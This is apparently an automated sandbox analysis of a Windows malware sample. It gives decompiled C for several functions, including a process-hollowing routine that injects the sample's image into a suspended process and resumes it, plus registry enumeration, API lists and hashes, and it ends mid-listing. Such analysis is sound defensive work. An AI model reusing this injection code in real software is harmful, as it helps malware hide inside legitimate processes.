                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
				void* _v8;
				void* _t15;
				void* _t16;
				void* _t18;
				int _t20;
				long _t26;
				struct HINSTANCE__* _t32;
				void* _t37;

				if(_a8 != 0) {
					_t32 = GetModuleHandleA(0);
					_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50);
					_t15 = VirtualAlloc(0, _t26, 0x1000, 4); // executed
					_v8 = _t15;
					if(_t15 == 0) {
						L5:
						_t16 = 0;
					} else {
						E0040EE08(_t15, _t32, _t26);
						_t18 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40); // executed
						_t37 = _t18;
						if(_t37 == 0) {
							goto L5;
						} else {
							E004062B7(_v8, _t37);
							_t20 = WriteProcessMemory(_a8, _t37, _v8, _t26, 0); // executed
							if(_t20 != 0) {
								 *_a16 = _t37;
								 *_a12 = _t37 - _t32 + _a4;
								_t16 = 1;
							} else {
								goto L5;
							}
						}
					}
					return _t16;
				} else {
					return 0;
				}
			}











                                                                                                                                  0x00406384
                                                                                                                                  0x00406395
                                                                                                                                  0x0040639a
                                                                                                                                  0x004063a9
                                                                                                                                  0x004063af
                                                                                                                                  0x004063b4
                                                                                                                                  0x004063f5
                                                                                                                                  0x004063f5
                                                                                                                                  0x004063b6
                                                                                                                                  0x004063b9
                                                                                                                                  0x004063ca
                                                                                                                                  0x004063d0
                                                                                                                                  0x004063d4
                                                                                                                                  0x00000000
                                                                                                                                  0x004063d6
                                                                                                                                  0x004063da
                                                                                                                                  0x004063eb
                                                                                                                                  0x004063f3
                                                                                                                                  0x004063fc
                                                                                                                                  0x00406406
                                                                                                                                  0x0040640a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004063f3
                                                                                                                                  0x004063d4
                                                                                                                                  0x0040640f
                                                                                                                                  0x00406386
                                                                                                                                  0x00406389
                                                                                                                                  0x00406389

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,?), ref: 0040638F
                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,00409816,?), ref: 004063A9
                                                                                                                                  • VirtualAllocEx.KERNELBASE(00000000,00000000,?,00001000,00000040), ref: 004063CA
                                                                                                                                  • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 004063EB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1965334864-0
                                                                                                                                  • Opcode ID: 014909fade78f05395cbd1441a738da6e4bc9fc9854897d694ec9e7df4869719
                                                                                                                                  • Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
                                                                                                                                  • Opcode Fuzzy Hash: 014909fade78f05395cbd1441a738da6e4bc9fc9854897d694ec9e7df4869719
                                                                                                                                  • Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004073FF Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 345registryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 264 4073ff-407419 265 40741b 264->265 266 40741d-407422 264->266 265->266 267 407424 266->267 268 407426-40742b 266->268 267->268 269 407430-407435 268->269 270 40742d 268->270 271 407437 269->271 272 40743a-407481 call 406dc2 call 402544 RegOpenKeyExA 269->272 270->269 271->272 277 407487-40749d call 40ee2a 272->277 278 4077f9-4077fe call 40ee2a 272->278 283 407703-40770e RegEnumKeyA 277->283 284 407801 278->284 285 4074a2-4074b1 call 406cad 283->285 286 407714-40771d RegCloseKey 283->286 287 407804-407808 284->287 290 4074b7-4074cc call 40f1a5 285->290 291 4076ed-407700 285->291 286->284 290->291 294 4074d2-4074f8 RegOpenKeyExA 290->294 291->283 295 407727-40772a 294->295 296 4074fe-407530 call 402544 RegQueryValueExA 294->296 297 407755-407764 call 40ee2a 295->297 298 40772c-407740 call 40ef00 295->298 296->295 305 407536-40753c 296->305 306 4076df-4076e2 297->306 307 407742-407745 RegCloseKey 298->307 308 40774b-40774e 298->308 309 40753f-407544 305->309 306->291 311 4076e4-4076e7 RegCloseKey 306->311 307->308 310 4077ec-4077f7 RegCloseKey 308->310 309->309 312 407546-40754b 309->312 310->287 311->291 312->297 313 407551-40756b call 40ee95 312->313 313->297 316 407571-407593 call 402544 call 40ee95 313->316 321 407753 316->321 322 407599-4075a0 316->322 321->297 323 4075a2-4075c6 call 40ef00 call 40ed03 322->323 324 4075c8-4075d7 call 40ed03 322->324 329 4075d8-4075da 323->329 324->329 331 4075dc 329->331 332 4075df-407623 call 40ee95 call 402544 call 40ee95 call 40ee2a 329->332 331->332 342 407626-40762b 332->342 342->342 343 40762d-407634 342->343 344 407637-40763c 343->344 344->344 345 40763e-407642 344->345 346 407644-407656 call 40ed77 345->346 347 40765c-407673 call 40ed23 345->347 346->347 352 407769-40777c call 40ef00 346->352 353 407680 347->353 354 407675-40767e 347->354 359 4077e3-4077e6 RegCloseKey 352->359 356 407683-40768e call 406cad 353->356 354->356 361 407722-407725 356->361 362 407694-4076bf call 40f1a5 call 406c96 356->362 359->310 363 4076dd 361->363 368 4076c1-4076c7 362->368 369 4076d8 362->369 363->306 368->369 370 4076c9-4076d2 368->370 369->363 370->369 371 40777e-407797 GetFileAttributesExA 370->371 372 407799 371->372 373 40779a-40779f 371->373 372->373 374 4077a1 373->374 375 4077a3-4077a8 373->375 374->375 376 4077c4-4077c8 375->376 377 4077aa-4077c0 call 40ee08 375->377 378 4077d7-4077dc 376->378 379 4077ca-4077d6 call 40ef00 376->379 377->376 382 4077e0-4077e2 378->382 383 4077de 378->383 379->378 382->359 383->382
                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                  			E004073FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
				CHAR* _v8;
				void* _v12;
				int _v16;
				void* _v20;
				int* _v24;
				char* _v28;
				intOrPtr _v32;
				int _v36;
				char _v295;
				char _v296;
				char _v556;
				void _v592;
				intOrPtr* _t85;
				int** _t86;
				char* _t87;
				char* _t88;
				intOrPtr _t89;
				char* _t91;
				long _t92;
				signed int _t93;
				long _t97;
				signed int _t103;
				long _t107;
				char* _t118;
				intOrPtr* _t119;
				CHAR* _t123;
				void* _t125;
				char* _t127;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr _t137;
				signed int* _t146;
				int** _t147;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				void* _t165;
				intOrPtr _t167;
				intOrPtr _t172;
				intOrPtr* _t173;
				void* _t186;
				intOrPtr _t187;
				int* _t188;
				void* _t190;
				void* _t191;
				char* _t192;
				signed int _t194;
				int* _t196;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;

				_t165 = __ecx;
				_t85 = _a8;
				_t188 = 0;
				_v16 = 0x104;
				if(_t85 != 0) {
					 *_t85 = 0;
				}
				_t86 = _a12;
				if(_t86 != _t188) {
					 *_t86 = _t188;
				}
				_t87 = _a16;
				if(_t87 != _t188) {
					 *_t87 = 0;
				}
				_t88 = _a20;
				if(_t88 != _t188) {
					 *_t88 = 0; // executed
				}
				_t89 = E00406DC2(_t165); // executed
				_v32 = _t89;
				_t160 = 0xe4;
				_t91 = E00402544(0x4122f8, 0x4106e8, 0x22, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
				_push(0x100);
				_push(_t188);
				_push(0x4122f8);
				if(_t92 != 0) {
					_t93 = E0040EE2A(_t165);
					goto L66;
				} else {
					E0040EE2A(_t165);
					_t206 = _t204 + 0xc;
					_push(_v16);
					_push( &_v556);
					_v24 = _t188;
					_push(_t188);
					while(1) {
						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
						if(_t97 != 0) {
							break;
						}
						if(E00406CAD( &_v556) == 0) {
							L41:
							_v24 =  &(_v24[0]);
							_push(0x104);
							_v16 = 0x104;
							_push( &_v556);
							_push(_v24);
							continue;
						}
						_t103 = E0040F1A5( &_v556);
						_pop(_t167);
						if((_t103 ^ 0x5e5e5e5e) != _v32) {
							goto L41;
						}
						_v12 = _t188;
						_v16 = 0x104;
						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12); // executed
						if(_t107 != _t188) {
							L45:
							if(_t107 != 5) {
								L50:
								E0040EE2A(_t167, 0x4122f8, _t188, 0x100);
								_t206 = _t206 + 0xc;
								L39:
								if(_v12 != _t188) {
									RegCloseKey(_v12);
								}
								goto L41;
							}
							E0040EF00(_a16,  &_v556);
							if(_v12 != _t188) {
								RegCloseKey(_v12);
							}
							_push(4);
							_pop(0);
							L64:
							RegCloseKey(_v20);
							return 0;
						}
						_t118 = E00402544(0x4122f8, 0x4106dc, 0xa, _t160, 0xc8);
						_t206 = _t206 + 0x14;
						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16); // executed
						if(_t107 != _t188) {
							goto L45;
						}
						_t119 =  &_v556;
						_t186 = _t119 + 1;
						do {
							_t167 =  *_t119;
							_t119 = _t119 + 1;
						} while (_t167 != 0);
						if(_v16 <= _t119 - _t186) {
							goto L50;
						}
						_t123 = E0040EE95( &_v296,  &_v556);
						_pop(_t167);
						_v8 = _t123;
						if(_t123 == _t188) {
							goto L50;
						}
						_t125 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						_t206 = _t206 + 0x1c;
						if(_t125 == 0) {
							_t188 = 0;
							goto L50;
						}
						if(_v296 != 0x22) {
							_t127 = E0040ED03( &_v296, 0x20);
							_pop(_t167);
						} else {
							E0040EF00( &_v296,  &_v295);
							_t127 = E0040ED03( &_v296, 0x22);
							_t206 = _t206 + 0x10;
						}
						if(_t127 != 0) {
							 *_t127 = 0;
						}
						_v8 = E0040EE95( &_v296,  &_v556);
						_v28 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						E0040EE2A(_t167, 0x4122f8, 0, 0x100);
						_t134 = _a4;
						_t206 = _t206 + 0x30;
						_t190 = _t134 + 1;
						do {
							_t172 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t172 != 0);
						_t173 = _v8;
						_t191 = _t134 - _t190;
						_t43 = _t173 + 1; // 0x1
						_t136 = _t43;
						do {
							_t187 =  *_t173;
							_t173 = _t173 + 1;
						} while (_t187 != 0);
						_t174 = _t173 - _t136;
						if(_t191 <= _t173 - _t136 || E0040ED77(_t191 - _t174 + _a4, _v8) != 0) {
							_t192 = _v28;
							 *_t192 = 0;
							_t137 = E0040ED23(_v8, 0x5c);
							_v8 = _t137;
							if(_t137 != 0) {
								_v8 = _v8 + 1;
							} else {
								_v8 =  &_v296;
							}
							if(E00406CAD(_v8) == 0) {
								 *_t192 = 0x2e;
								goto L38;
							} else {
								_t194 = E0040F1A5(_v8) ^ 0x5e5e5e5e;
								_t163 = _t194 >> 0x00000008 & 0x000000ff;
								 *_v28 = 0x2e;
								if(E00406C96(_t194) != 0) {
									L37:
									_t160 = 0xe4;
									L38:
									_t188 = 0;
									goto L39;
								}
								_t56 = _t163 - 0x51; // -81
								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
									goto L37;
								} else {
									_t196 = 0;
									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
										_t196 = 1;
									}
									_t146 = _a8;
									if(_t146 != 0) {
										 *_t146 = _t163;
									}
									_t164 = _a16;
									if(_t164 != 0) {
										_t202 = _v8 -  &_v296;
										E0040EE08(_t164,  &_v296, _t202);
										 *((char*)(_t202 + _t164)) = 0;
									}
									if(_a20 != 0) {
										E0040EF00(_a20, _v8);
									}
									_t147 = _a12;
									if(_t147 != 0) {
										 *_t147 = _t196;
									}
									_push(3);
									_pop(0);
									goto L63;
								}
							}
						} else {
							E0040EF00(_a16,  &_v556);
							L63:
							RegCloseKey(_v12); // executed
							goto L64;
						}
					}
					_t93 = RegCloseKey(_v20);
					L66:
					return _t93 | 0xffffffff;
				}
			}























































                                                                                                                                  0x004073ff
                                                                                                                                  0x00407408
                                                                                                                                  0x0040740e
                                                                                                                                  0x00407410
                                                                                                                                  0x00407419
                                                                                                                                  0x0040741b
                                                                                                                                  0x0040741b
                                                                                                                                  0x0040741d
                                                                                                                                  0x00407422
                                                                                                                                  0x00407424
                                                                                                                                  0x00407424
                                                                                                                                  0x00407426
                                                                                                                                  0x0040742b
                                                                                                                                  0x0040742d
                                                                                                                                  0x0040742d
                                                                                                                                  0x00407430
                                                                                                                                  0x00407435
                                                                                                                                  0x00407437
                                                                                                                                  0x00407437
                                                                                                                                  0x0040743a
                                                                                                                                  0x0040743f
                                                                                                                                  0x00407451
                                                                                                                                  0x00407464
                                                                                                                                  0x00407469
                                                                                                                                  0x00407472
                                                                                                                                  0x00407478
                                                                                                                                  0x0040747d
                                                                                                                                  0x0040747e
                                                                                                                                  0x00407481
                                                                                                                                  0x004077f9
                                                                                                                                  0x00000000
                                                                                                                                  0x00407487
                                                                                                                                  0x00407487
                                                                                                                                  0x0040748c
                                                                                                                                  0x0040748f
                                                                                                                                  0x00407498
                                                                                                                                  0x00407499
                                                                                                                                  0x0040749c
                                                                                                                                  0x00407703
                                                                                                                                  0x00407706
                                                                                                                                  0x0040770e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004074b1
                                                                                                                                  0x004076ed
                                                                                                                                  0x004076ed
                                                                                                                                  0x004076f5
                                                                                                                                  0x004076f6
                                                                                                                                  0x004076ff
                                                                                                                                  0x00407700
                                                                                                                                  0x00000000
                                                                                                                                  0x00407700
                                                                                                                                  0x004074be
                                                                                                                                  0x004074c8
                                                                                                                                  0x004074cc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004074e6
                                                                                                                                  0x004074e9
                                                                                                                                  0x004074f0
                                                                                                                                  0x004074f8
                                                                                                                                  0x00407727
                                                                                                                                  0x0040772a
                                                                                                                                  0x00407755
                                                                                                                                  0x0040775c
                                                                                                                                  0x00407761
                                                                                                                                  0x004076df
                                                                                                                                  0x004076e2
                                                                                                                                  0x004076e7
                                                                                                                                  0x004076e7
                                                                                                                                  0x00000000
                                                                                                                                  0x004076e2
                                                                                                                                  0x00407736
                                                                                                                                  0x00407740
                                                                                                                                  0x00407745
                                                                                                                                  0x00407745
                                                                                                                                  0x0040774b
                                                                                                                                  0x0040774d
                                                                                                                                  0x004077ec
                                                                                                                                  0x004077ef
                                                                                                                                  0x00000000
                                                                                                                                  0x004077f5
                                                                                                                                  0x0040751c
                                                                                                                                  0x00407521
                                                                                                                                  0x00407528
                                                                                                                                  0x00407530
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407536
                                                                                                                                  0x0040753c
                                                                                                                                  0x0040753f
                                                                                                                                  0x0040753f
                                                                                                                                  0x00407541
                                                                                                                                  0x00407542
                                                                                                                                  0x0040754b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040755f
                                                                                                                                  0x00407565
                                                                                                                                  0x00407566
                                                                                                                                  0x0040756b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407589
                                                                                                                                  0x0040758e
                                                                                                                                  0x00407593
                                                                                                                                  0x00407753
                                                                                                                                  0x00000000
                                                                                                                                  0x00407753
                                                                                                                                  0x004075a0
                                                                                                                                  0x004075d1
                                                                                                                                  0x004075d7
                                                                                                                                  0x004075a2
                                                                                                                                  0x004075b0
                                                                                                                                  0x004075be
                                                                                                                                  0x004075c3
                                                                                                                                  0x004075c3
                                                                                                                                  0x004075da
                                                                                                                                  0x004075dc
                                                                                                                                  0x004075dc
                                                                                                                                  0x004075fc
                                                                                                                                  0x00407615
                                                                                                                                  0x00407618
                                                                                                                                  0x0040761d
                                                                                                                                  0x00407620
                                                                                                                                  0x00407623
                                                                                                                                  0x00407626
                                                                                                                                  0x00407626
                                                                                                                                  0x00407628
                                                                                                                                  0x00407629
                                                                                                                                  0x0040762d
                                                                                                                                  0x00407632
                                                                                                                                  0x00407634
                                                                                                                                  0x00407634
                                                                                                                                  0x00407637
                                                                                                                                  0x00407637
                                                                                                                                  0x00407639
                                                                                                                                  0x0040763a
                                                                                                                                  0x0040763e
                                                                                                                                  0x00407642
                                                                                                                                  0x0040765c
                                                                                                                                  0x00407664
                                                                                                                                  0x00407667
                                                                                                                                  0x0040766e
                                                                                                                                  0x00407673
                                                                                                                                  0x00407680
                                                                                                                                  0x00407675
                                                                                                                                  0x0040767b
                                                                                                                                  0x0040767b
                                                                                                                                  0x0040768e
                                                                                                                                  0x00407722
                                                                                                                                  0x00000000
                                                                                                                                  0x00407694
                                                                                                                                  0x004076a1
                                                                                                                                  0x004076ad
                                                                                                                                  0x004076b3
                                                                                                                                  0x004076bf
                                                                                                                                  0x004076d8
                                                                                                                                  0x004076d8
                                                                                                                                  0x004076dd
                                                                                                                                  0x004076dd
                                                                                                                                  0x00000000
                                                                                                                                  0x004076dd
                                                                                                                                  0x004076c1
                                                                                                                                  0x004076c7
                                                                                                                                  0x00000000
                                                                                                                                  0x0040777e
                                                                                                                                  0x00407785
                                                                                                                                  0x00407797
                                                                                                                                  0x00407799
                                                                                                                                  0x00407799
                                                                                                                                  0x0040779a
                                                                                                                                  0x0040779f
                                                                                                                                  0x004077a1
                                                                                                                                  0x004077a1
                                                                                                                                  0x004077a3
                                                                                                                                  0x004077a8
                                                                                                                                  0x004077b3
                                                                                                                                  0x004077b8
                                                                                                                                  0x004077c0
                                                                                                                                  0x004077c0
                                                                                                                                  0x004077c8
                                                                                                                                  0x004077d0
                                                                                                                                  0x004077d6
                                                                                                                                  0x004077d7
                                                                                                                                  0x004077dc
                                                                                                                                  0x004077de
                                                                                                                                  0x004077de
                                                                                                                                  0x004077e0
                                                                                                                                  0x004077e2
                                                                                                                                  0x00000000
                                                                                                                                  0x004077e2
                                                                                                                                  0x004076c7
                                                                                                                                  0x00407769
                                                                                                                                  0x00407773
                                                                                                                                  0x004077e3
                                                                                                                                  0x004077e6
                                                                                                                                  0x00000000
                                                                                                                                  0x004077e6
                                                                                                                                  0x00407642
                                                                                                                                  0x00407717
                                                                                                                                  0x00407801
                                                                                                                                  0x00000000
                                                                                                                                  0x00407801

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,761B43E0,00000000), ref: 00407472
                                                                                                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000101,?,?,?,?,?,?,?,761B43E0,00000000), ref: 004074F0
                                                                                                                                  • RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,761B43E0,00000000), ref: 00407528
                                                                                                                                  • ___ascii_stricmp.LIBCMT ref: 0040764D
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,761B43E0,00000000), ref: 004076E7
                                                                                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,761B43E0,00000000), ref: 00407717
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,761B43E0,00000000), ref: 00407745
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,761B43E0,00000000), ref: 004077EF
                                                                                                                                    • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
                                                                                                                                  • RegCloseKey.KERNELBASE(?), ref: 004077E6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                                                                  • String ID: "
                                                                                                                                  • API String ID: 3433985886-123907689
                                                                                                                                  • Opcode ID: f1bdd205be3518b321dbe0f69f041738494d7e4aaaefcefb02a6695f8730bb92
                                                                                                                                  • Instruction ID: 2be8177c38fcb0431c37abdcb30432b02610efeff0693f38a05b2573c300e2d4
                                                                                                                                  • Opcode Fuzzy Hash: f1bdd205be3518b321dbe0f69f041738494d7e4aaaefcefb02a6695f8730bb92
                                                                                                                                  • Instruction Fuzzy Hash: E8C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1004B7F504B72D1EA79AE908B69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040977C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82threadinjectionprocessCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 386 40977c-4097b9 call 40ee2a CreateProcessA 389 4097c2-4097f3 call 40ee2a GetThreadContext 386->389 390 4097bb-4097bd 386->390 394 409801-40981c call 40637c 389->394 395 4097f5 389->395 391 409864-409866 390->391 396 4097f6-4097ff TerminateProcess 394->396 399 40981e-409839 WriteProcessMemory 394->399 395->396 396->390 399->395 400 40983b-409856 SetThreadContext 399->400 400->395 401 409858-409863 ResumeThread 400->401 401->391
                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                  			E0040977C(void* __ecx, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				void _v24;
				char _v28;
				struct _STARTUPINFOA _v96;
				struct _CONTEXT _v812;
				int _t26;
				int _t30;
				void* _t33;
				int _t39;
				int _t42;

				_t46 = __ecx;
				E0040EE2A(__ecx,  &_v96, 0, 0x44);
				_v96.cb = 0x44;
				_t26 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20); // executed
				if(_t26 != 0) {
					E0040EE2A(_t46,  &_v812, 0, 0x2cc);
					_v812.ContextFlags = 0x10002;
					_t30 = GetThreadContext(_v20.hThread,  &_v812); // executed
					if(_t30 != 0) {
						_t33 = E0040637C(_entry_, _v20.hProcess,  &_v28,  &_v24); // executed
						_push(0);
						if(_t33 == 0) {
							L4:
							TerminateProcess(_v20.hProcess, ??);
							goto L1;
						}
						_t39 = WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??); // executed
						if(_t39 == 0) {
							goto L3;
						}
						_v812.Eax = _v28;
						_t42 = SetThreadContext(_v20.hThread,  &_v812); // executed
						if(_t42 == 0) {
							goto L3;
						}
						ResumeThread(_v20.hThread); // executed
						return 1;
					}
					L3:
					_push(0);
					goto L4;
				}
				L1:
				return 0;
			}













                                                                                                                                  0x0040977c
                                                                                                                                  0x0040978f
                                                                                                                                  0x004097a9
                                                                                                                                  0x004097b1
                                                                                                                                  0x004097b9
                                                                                                                                  0x004097cf
                                                                                                                                  0x004097e1
                                                                                                                                  0x004097eb
                                                                                                                                  0x004097f3
                                                                                                                                  0x00409811
                                                                                                                                  0x00409819
                                                                                                                                  0x0040981c
                                                                                                                                  0x004097f6
                                                                                                                                  0x004097f9
                                                                                                                                  0x00000000
                                                                                                                                  0x004097f9
                                                                                                                                  0x00409831
                                                                                                                                  0x00409839
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040983e
                                                                                                                                  0x0040984e
                                                                                                                                  0x00409856
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040985b
                                                                                                                                  0x00000000
                                                                                                                                  0x00409863
                                                                                                                                  0x004097f5
                                                                                                                                  0x004097f5
                                                                                                                                  0x00000000
                                                                                                                                  0x004097f5
                                                                                                                                  0x004097bb
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNELBASE(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,004122F8), ref: 004097B1
                                                                                                                                  • GetThreadContext.KERNELBASE(?,?,?,?,?,?,?,004122F8), ref: 004097EB
                                                                                                                                  • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 004097F9
                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 00409831
                                                                                                                                  • SetThreadContext.KERNELBASE(?,00010002,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040984E
                                                                                                                                  • ResumeThread.KERNELBASE(?,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040985B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                                                                  • String ID: D
                                                                                                                                  • API String ID: 2981417381-2746444292
                                                                                                                                  • Opcode ID: 32bae011682959fb3fb7d6c44d279b6a6e60969011b3782382acaed110600071
                                                                                                                                  • Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
                                                                                                                                  • Opcode Fuzzy Hash: 32bae011682959fb3fb7d6c44d279b6a6e60969011b3782382acaed110600071
                                                                                                                                  • Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00404280 Relevance: 7.6, APIs: 5, Instructions: 124COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00404280(void* __ecx, intOrPtr _a4) {
				void* _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _t35;
				signed int _t38;
				signed int _t39;
				signed int _t40;
				void* _t67;
				void* _t68;
				void* _t73;
				intOrPtr* _t74;

				_t68 = __ecx;
				_t35 = CreateEventA(0, 1, 1, 0);
				_v8 = _t35;
				if(_t35 != 0) {
					_t38 = E00404000(E00403ECD(_t68),  &_v20);
					if(_t38 == 0) {
						L11:
						_t39 = FindCloseChangeNotification(_v8); // executed
						_t40 = _t39 | 0xffffffff;
						L12:
						return _t40;
					}
					_t67 = _v20;
					_t40 = _t38 | 0xffffffff;
					if(_t67 == _t40) {
						goto L12;
					}
					_v16 = E0040ECA5();
					E00403F18(_t67,  &_v16, 4, _v8, 0x7d0);
					if(E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {
						CloseHandle(_t67);
						goto L11;
					} else {
						_v12 = _v12 + (_v12 >> 2);
						E00403F18(_t67,  &_v12, 4, _v8, 0x7d0);
						_v28 = 1;
						_t73 = 0xc;
						_v24 = 1;
						E00403F18(_t67,  &_v28, 8, _v8, 0x7d0);
						_t74 = E0040EBCC(_t73);
						 *_t74 = 0x5e;
						 *((intOrPtr*)(_t74 + 4)) = 2;
						if(_a4 != 0) {
							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
							 *0x41215a =  *0x41215a + 1;
						} else {
							 *(_t74 + 8) = 1;
						}
						E00403F18(_t67, _t74, _v24, _v8, 0x7d0);
						E0040EC2E(_t74);
						E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0);
						CloseHandle(_v8);
						CloseHandle(_t67);
						_t40 = 0 | _a4 == 0x00000000;
						goto L12;
					}
				}
				return _t35 | 0xffffffff;
			}

















                                                                                                                                  0x00404280
                                                                                                                                  0x00404290
                                                                                                                                  0x00404296
                                                                                                                                  0x0040429b
                                                                                                                                  0x004042b1
                                                                                                                                  0x004042ba
                                                                                                                                  0x004043c1
                                                                                                                                  0x004043c4
                                                                                                                                  0x004043ca
                                                                                                                                  0x004043cd
                                                                                                                                  0x00000000
                                                                                                                                  0x004043ce
                                                                                                                                  0x004042c0
                                                                                                                                  0x004042c3
                                                                                                                                  0x004042c8
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004042dc
                                                                                                                                  0x004042e6
                                                                                                                                  0x00404300
                                                                                                                                  0x004043bb
                                                                                                                                  0x00000000
                                                                                                                                  0x00404318
                                                                                                                                  0x00404322
                                                                                                                                  0x0040432c
                                                                                                                                  0x00404333
                                                                                                                                  0x00404336
